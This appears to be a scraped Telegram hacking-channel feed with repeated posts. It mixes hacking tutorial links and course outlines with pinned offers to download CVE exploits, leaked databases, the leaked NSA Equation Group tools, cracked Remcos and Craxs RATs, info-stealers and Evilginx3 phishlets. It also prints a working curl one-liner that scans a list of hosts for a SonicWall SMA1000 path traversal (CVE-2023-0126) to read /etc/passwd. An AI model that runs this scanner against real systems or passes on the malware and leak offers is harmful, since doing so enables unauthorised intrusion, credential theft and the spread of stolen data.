Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Here are some YouTube videos on hacking beginners to advanced roadmap tutorials:
* [the hackerโs roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck
* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress
* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security
* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor
* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by Simplilearn
I hope these videos help you on your journey to becoming a hacker!
http://googleusercontent.com/youtube_content/5
* [the hackerโs roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck
* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress
* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security
* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor
* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by Simplilearn
I hope these videos help you on your journey to becoming a hacker!
http://googleusercontent.com/youtube_content/5
YouTube
the hackerโs roadmap (how to get started in IT in 2023)
This video is outdated! Watch the 2025 version: https://youtu.be/5xWnmUEi1Qw?si=ullcXDUh0uPUzoUF
This video was originally sponsored by ITProTV. Weโve since launched NetworkChuck Academy, our own place to learn IT: https://ntck.co/NCAcademy
Are you wantingโฆ
This video was originally sponsored by ITProTV. Weโve since launched NetworkChuck Academy, our own place to learn IT: https://ntck.co/NCAcademy
Are you wantingโฆ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Telegram Search Engine
Search for Channels, Bots & Groups.
xtea.io/ts_en.html
#cybersecurity #infosec #OSINT
Search for Channels, Bots & Groups.
xtea.io/ts_en.html
#cybersecurity #infosec #OSINT
XTEA
XTEA - Telegram Search Engine | Find Channels, Groups & Bots
Discover thousands of Telegram channels, groups, and bots instantly. The #1 Telegram search engine.
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Top Coding Challenge Websites to improve your skills.
โข LeetCode
๐ leetcode.com
โข Codewars
๐ codewars.com
โข HackerRank
๐ hackerrank.com
โข CodeChef
๐ codechef.com
โข iCodeThis
๐ icodethis.com
โข Frontend Mentor
๐ frontendmentor.io
โข playCSS
๐ playcss.app
โข Coderbyte
๐ coderbyte.com
โข CodinGame
๐ codingame.com
โข LeetCode
๐ leetcode.com
โข Codewars
๐ codewars.com
โข HackerRank
๐ hackerrank.com
โข CodeChef
๐ codechef.com
โข iCodeThis
๐ icodethis.com
โข Frontend Mentor
๐ frontendmentor.io
โข playCSS
๐ playcss.app
โข Coderbyte
๐ coderbyte.com
โข CodinGame
๐ codingame.com
๐ธBlack Wallpaper HD Background App Data Leak : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
CrackCodes ๐ฎ๐ณ pinned ยซ๐ธBlack Wallpaper HD Background App Data Leak : Download ๐ชฌPlayTube CVE-2023-4714 Exploit : Check ๐ธPaperCut NG CVE-2023-4568 Exploit : Check ๐Prestashop CVE-2023-39677 Exploit : Check ๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check ๐ฒCisco CVE-2023โฆยป
๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฏ-๐ฌ๐ญ๐ฎ๐ฒ ๐ฃ๐ฟ๐ฒ-๐ฎ๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฃ๐ฎ๐๐ต ๐๐ฟ๐ฎ๐๐ฒ๐ฟ๐๐ฎ๐น ๐๐๐น๐ป๐ฒ๐ฟ๐ฎ๐ฏ๐ถ๐น๐ถ๐๐ ๐ถ๐ป ๐ฆ๐ ๐๐ญ๐ฌ๐ฌ๐ฌ
๐๐ฅ
Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
๐๐ฅ
Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
CVE-2023-0126 Pre-authentication path traversal vulnerability in SMA1000
One Liner
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโฆ
One Liner
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโฆ
๐1
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
(FREE) Complete Ethical Hacking Training 15+ Hours by whitesec cyber security consultancy and Trainings.
course topics -
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhat vs whitehat
33:28 What Problem does ethical hackers identify
38:24 limitations of ethical hacking
44:55 Installing Vmware and Downloding kali linux
46:30 Setuping Kali Linux
58:36 What is FootPrinting
1:07:58 What is Passive Information Gathering
1:16:41 What is Active Information Gathering
1:25:30 How to Perform FootPrinting
1:38:26 How to Perform google Hacking
2:17:11 How to Perform Footprinting Through Shodan
2:31:02 Footprinting censys and whois
2:41:20 Website FootPrinting using Wappalyzer and Netcraft
2:53:45 Finding subdomains
3:29:25 Extracting Website Links
3:34:41 Gathering Information of SSL Certificate
3:44:44 Email FootPrinting
3:52:04 What is Network Scanning
4:00:05 Scanning Network Using Nmap
4:11:18 How to Perform enumeration on ftp ssh telnet smtp
4:24:28 Vulnerability Scanning using nmap
4:27:43 Vulnerability scanning on websites
4:32:04 cracking windows passwords
4:45:35 How to Perform Steganography
4:56:57 what is malware
5:20:24 Trojan keylogger ransomware virus practically
5:42:19 social Engineering - Using Premade Web Template for Phishing
5:45:33 Social Engineering Site Cloning
5:48:18 Adapter for wifi hacking
5:49:35 wifi hacking
5:57:06 windows hacking and penetration testing
5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab
6:17:53 Scanning Network
6:23:32 checking live machines in Network
6:29:00 Scanning OS and about TTL
6:33:25 About Nmap and Open Ports
6:42:38 service version detection and exploits
6:45:30 How to detect firewall
6:47:38 How to Bypass Firewall
6:49:38 About Fragmentation How its work
6:53:33 What is syn scan and How to perform it
7:02:18 How to Perform Nmap Scan using Different ips (Explanation)
7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning
7:15:36 Enumeration using Nmap(Explanation)
7:24:30 How to Perform Enumeration (Practically)
7:36:58 How to Perform Vulnerability Scanning Using Nmap
7:45:11 About Metasploit
7:56:03 About MSFvenom
8:01:04 65.Generating Encoded Payload Using Metasploit
8:09:28 MSF console setting up Connection
8:19:20 About Privilege Escalation
8:31:43 Examples Of Privilege Escalation
8:36:45 How to Perform Privilege Escalation
8:43:42 About Eternalblue Vulnerability
8:51:48 what is external and internal network
8:56:32 About Eternalblue Vulnerability-2
9:02:16 Exploiting Eternalblue vulnerability
9:12:30 Exploiting Windows 7 and some important commands
9:24:40 setting up Persistence
9:45:48 privilege Escalation in windows 7
9:55:48 privilege Escalation in Windows 10
10:07:32 Persistence in windows 10
10:13:22 how to clear logs from victim machine
10:17:33 what is migration
10:24:14 Dumping windows Hashes
part - 2
0:37 Dumping Windows Hashes From Memory
6:36 Dumping Clear Text Password from windows
14:45 cracking Hashes Using John the ripper
27:43 injecting payload in real Application
36:50 Setting Up shelter
44:01 How to Generate Advance Payload Using Veil Framework
57:56 Compile Veil Python file to exe
1:14:40 How to implement this Attacks in real world
1:22:25 Advance Red team training
1:44:51 Android Hacking and important notice
1:47:34 How to Setup ngrok
1:56:47 Live Android Remote Access
2:02:32 How to Control Android
2:07:38 installing Ngrok in kali Linux
2:09:25 How to Setup Fatrat
2:22:56 Generating Payload using Fatrat
2:34:35 Setting up Rapid Payload and generating payload
2:46:26 Advance android hacking course
3:13:57 Kali Linux hacking
Training Link ๐๐
part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHda
part - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
course topics -
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhat vs whitehat
33:28 What Problem does ethical hackers identify
38:24 limitations of ethical hacking
44:55 Installing Vmware and Downloding kali linux
46:30 Setuping Kali Linux
58:36 What is FootPrinting
1:07:58 What is Passive Information Gathering
1:16:41 What is Active Information Gathering
1:25:30 How to Perform FootPrinting
1:38:26 How to Perform google Hacking
2:17:11 How to Perform Footprinting Through Shodan
2:31:02 Footprinting censys and whois
2:41:20 Website FootPrinting using Wappalyzer and Netcraft
2:53:45 Finding subdomains
3:29:25 Extracting Website Links
3:34:41 Gathering Information of SSL Certificate
3:44:44 Email FootPrinting
3:52:04 What is Network Scanning
4:00:05 Scanning Network Using Nmap
4:11:18 How to Perform enumeration on ftp ssh telnet smtp
4:24:28 Vulnerability Scanning using nmap
4:27:43 Vulnerability scanning on websites
4:32:04 cracking windows passwords
4:45:35 How to Perform Steganography
4:56:57 what is malware
5:20:24 Trojan keylogger ransomware virus practically
5:42:19 social Engineering - Using Premade Web Template for Phishing
5:45:33 Social Engineering Site Cloning
5:48:18 Adapter for wifi hacking
5:49:35 wifi hacking
5:57:06 windows hacking and penetration testing
5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab
6:17:53 Scanning Network
6:23:32 checking live machines in Network
6:29:00 Scanning OS and about TTL
6:33:25 About Nmap and Open Ports
6:42:38 service version detection and exploits
6:45:30 How to detect firewall
6:47:38 How to Bypass Firewall
6:49:38 About Fragmentation How its work
6:53:33 What is syn scan and How to perform it
7:02:18 How to Perform Nmap Scan using Different ips (Explanation)
7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning
7:15:36 Enumeration using Nmap(Explanation)
7:24:30 How to Perform Enumeration (Practically)
7:36:58 How to Perform Vulnerability Scanning Using Nmap
7:45:11 About Metasploit
7:56:03 About MSFvenom
8:01:04 65.Generating Encoded Payload Using Metasploit
8:09:28 MSF console setting up Connection
8:19:20 About Privilege Escalation
8:31:43 Examples Of Privilege Escalation
8:36:45 How to Perform Privilege Escalation
8:43:42 About Eternalblue Vulnerability
8:51:48 what is external and internal network
8:56:32 About Eternalblue Vulnerability-2
9:02:16 Exploiting Eternalblue vulnerability
9:12:30 Exploiting Windows 7 and some important commands
9:24:40 setting up Persistence
9:45:48 privilege Escalation in windows 7
9:55:48 privilege Escalation in Windows 10
10:07:32 Persistence in windows 10
10:13:22 how to clear logs from victim machine
10:17:33 what is migration
10:24:14 Dumping windows Hashes
part - 2
0:37 Dumping Windows Hashes From Memory
6:36 Dumping Clear Text Password from windows
14:45 cracking Hashes Using John the ripper
27:43 injecting payload in real Application
36:50 Setting Up shelter
44:01 How to Generate Advance Payload Using Veil Framework
57:56 Compile Veil Python file to exe
1:14:40 How to implement this Attacks in real world
1:22:25 Advance Red team training
1:44:51 Android Hacking and important notice
1:47:34 How to Setup ngrok
1:56:47 Live Android Remote Access
2:02:32 How to Control Android
2:07:38 installing Ngrok in kali Linux
2:09:25 How to Setup Fatrat
2:22:56 Generating Payload using Fatrat
2:34:35 Setting up Rapid Payload and generating payload
2:46:26 Advance android hacking course
3:13:57 Kali Linux hacking
Training Link ๐๐
part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHda
part - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
YouTube
Complete Ethical hacking course 16 hours | ethical hacking full course with practical | Zero to Hero
free ethical hacking course by whitesec cyber security consultancy pvt ltd.
course content :-
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhatโฆ
course content :-
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhatโฆ
๐2
Hey Everyone, you can join our WhatsApp Channel too, just to get some Important and Good Resources
Join us Now: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
Join us Now: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโค3
๐ธBlack Wallpaper HD Background App Data Leak : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐3โค1
CrackCodes ๐ฎ๐ณ pinned ยซ๐พCraxs Rat V6.7 : Download ๐งฎEvilginx3 Phishlets : Download ๐ฒChrome-extention Stealer V2 : Download ๐ธInvicta Stealer: A Powerful, Native Stealer : Download ๐ชฌRemcos Rat 3.8.0 Cracked : Download ๐NSA Equation Group Hacking Tools Leaked : Downloadยป
Follow the Cybertix channel on WhatsApp: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
New Release โผ๏ธ
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐จ๐ก๐๐ข๐ก ๐๐๐๐ฎ๐ฐ๐ธ
๐ง๐ผ๐ฝ๐ถ๐ฐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. What is UNION Operator
๐ฎ. How UNION Attack Works
๐ฏ. Practically Exploiting other Tables in database using UNION Attack๐ฅ
& ๐บ๐ฎ๐ป๐ ๐ ๐ผ๐ฟ๐ฒ
Please Share your Views & Like + Subscribe to our YouTube channel for more ๐๐๐ง๐๐๐๐๐ Explanation of Vulnerabilities ๐๐
๐๐ถ๐ป๐ธ: https://youtu.be/ussCtO2AfUc?si=gMjaT0vCpbMlELMI
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐จ๐ก๐๐ข๐ก ๐๐๐๐ฎ๐ฐ๐ธ
๐ง๐ผ๐ฝ๐ถ๐ฐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. What is UNION Operator
๐ฎ. How UNION Attack Works
๐ฏ. Practically Exploiting other Tables in database using UNION Attack๐ฅ
& ๐บ๐ฎ๐ป๐ ๐ ๐ผ๐ฟ๐ฒ
Please Share your Views & Like + Subscribe to our YouTube channel for more ๐๐๐ง๐๐๐๐๐ Explanation of Vulnerabilities ๐๐
๐๐ถ๐ป๐ธ: https://youtu.be/ussCtO2AfUc?si=gMjaT0vCpbMlELMI
YouTube
27 SQL Injection UNION Attack
๐๐น๐๐๐ค๐๐ง๐๐๐: https://drive.google.com/file/d/1LE9bKQsU2iubWkTX0XmEKDvye-m6CbDX/view?usp=sharing
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.โฆ
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.โฆ
โค2
Forwarded from Dheeraj Yadav
๐ฅ๐ฅFREE COURSE GIVEAWAY๐ฅ๐ฅ
As udemy have limitations on generating free coupons, we have decided to giveaway 1000free coupons.
The course is not completed yet, we are still doing improvement in the content and it's quality. So, it's suggested that just redeem the coupon as of now and start watching the course after 15th October, as the course will be completed till then.
We would be updating all the uploaded content and adding many more new videos to make it interesting and knowledge both at the same time.
I expect you would give a good rating and feedback for our efforts.
https://www.udemy.com/course/a-beginners-guide-to-osint
Check out this video for new coupon code and course introduction.
https://youtu.be/10BP7Fv2s4k?si=7AW3kOBMmjjrDhaQ
Don't forgot to subscribe the channel and like the video.
As udemy have limitations on generating free coupons, we have decided to giveaway 1000free coupons.
The course is not completed yet, we are still doing improvement in the content and it's quality. So, it's suggested that just redeem the coupon as of now and start watching the course after 15th October, as the course will be completed till then.
We would be updating all the uploaded content and adding many more new videos to make it interesting and knowledge both at the same time.
I expect you would give a good rating and feedback for our efforts.
https://www.udemy.com/course/a-beginners-guide-to-osint
Check out this video for new coupon code and course introduction.
https://youtu.be/10BP7Fv2s4k?si=7AW3kOBMmjjrDhaQ
Don't forgot to subscribe the channel and like the video.
Udemy
A Beginner's Guide to OSINT
<p>In this digital age, information is everywhere. Whether it's finding information about a new job opportunity, learning more about a potential date, investigating a business competitor, or even just ensuring your own digital privacy, there's a growing needโฆ
41 Canadian Diplomats to Get out of India! by oct 10
India's Strong Diplomatic Move
__report (source)
India's Strong Diplomatic Move
__report (source)
๐ฅ5